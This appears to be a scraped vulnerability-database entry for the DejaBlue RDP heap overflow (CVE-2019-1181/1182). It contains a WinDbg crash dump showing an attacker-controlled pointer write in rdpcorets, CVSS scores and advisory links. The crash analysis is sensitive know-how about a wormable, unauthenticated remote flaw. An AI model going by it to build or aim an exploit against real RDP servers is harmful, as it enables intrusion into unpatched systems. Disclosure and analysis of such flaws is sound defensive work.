00000050`beaaf720 00007fff`c9ed13d2 rdpcorets!DllGetClassObject+0x75b3
00000050`beaaf7e0 00007fff`caf654f4 KERNEL32!BaseThreadInitThunk+0x22
00000050`beaaf810 00000000`00000000 ntdll!RtlUserThreadStart+0x34
0:033> u
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014 mov qword ptr [r8+14h],rdx
00007fff`a5b79d3a 498d5028 lea rdx,[r8+28h]
00007fff`a5b79d3e 41c7401038000000 mov dword ptr [r8+10h],38h
00007fff`a5b79d46 4d89481c mov qword ptr [r8+1Ch],r9
00007fff`a5b79d4a 45894824 mov dword ptr [r8+24h],r9d
00007fff`a5b79d4e 8d0c8510000000 lea ecx,[rax*4+10h]
00007fff`a5b79d55 4803ca add rcx,rdx
00007fff`a5b79d58 44890a mov dword ptr [rdx],r9d
0:033> r
rax=0000000000000000 rbx=00007fffa5b79d10 rcx=00000050bf0c1940
rdx=0000000000000001 rsi=00000050bdcba9a0 rdi=00000050bf0c1940
rip=00007fffa5b79d36 rsp=00000050beaaf478 rbp=00000050bf0c7450
r8=4141414141414141 r9=0000000000000000 r10=0000000000000007
r11=00000050beaaf4b8 r12=00000050bf0c1f40 r13=00000050bf0c23c0
r14=0000000000000000 r15=00000050bdccfdc0
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014 mov qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 3
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1182
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1182
portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1181
twitter.com/malwaretechblog/status/1161329312986873857?s=12
www.malwaretech.com/2019/08/dejablue-analyzing-a-rdp-heap-overflow.html
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C